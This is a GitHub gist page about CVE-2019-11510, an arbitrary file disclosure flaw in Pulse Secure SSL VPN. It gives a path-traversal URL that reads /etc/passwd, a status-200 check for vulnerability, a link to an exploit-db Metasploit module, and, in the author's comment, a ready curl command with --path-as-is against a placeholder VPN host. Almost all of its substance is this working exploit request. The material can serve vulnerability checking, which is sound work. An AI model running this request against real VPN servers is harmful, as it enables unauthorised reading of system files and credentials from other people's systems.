Skip to content

Instantly share code, notes, and snippets.

@rudSarkar

rudSarkar/Pulse_Secure_8.1.md

Created August 25, 2020 17:17
Show Gist options
  • Save rudSarkar/75c35bb5db16d290a89007046a21c40e to your computer and use it in GitHub Desktop.
Save rudSarkar/75c35bb5db16d290a89007046a21c40e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Pulse_Secure_8.1.md

Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)

CVE

CVE: 2019-11510

If status == 200 then it's vulnerable

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole

Exploit

https://www.exploit-db.com/exploits/47297

@rudSarkar
Copy link
Author

CURL Requests

curl -Ik --path-as-is https://ssl_vpn_url/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment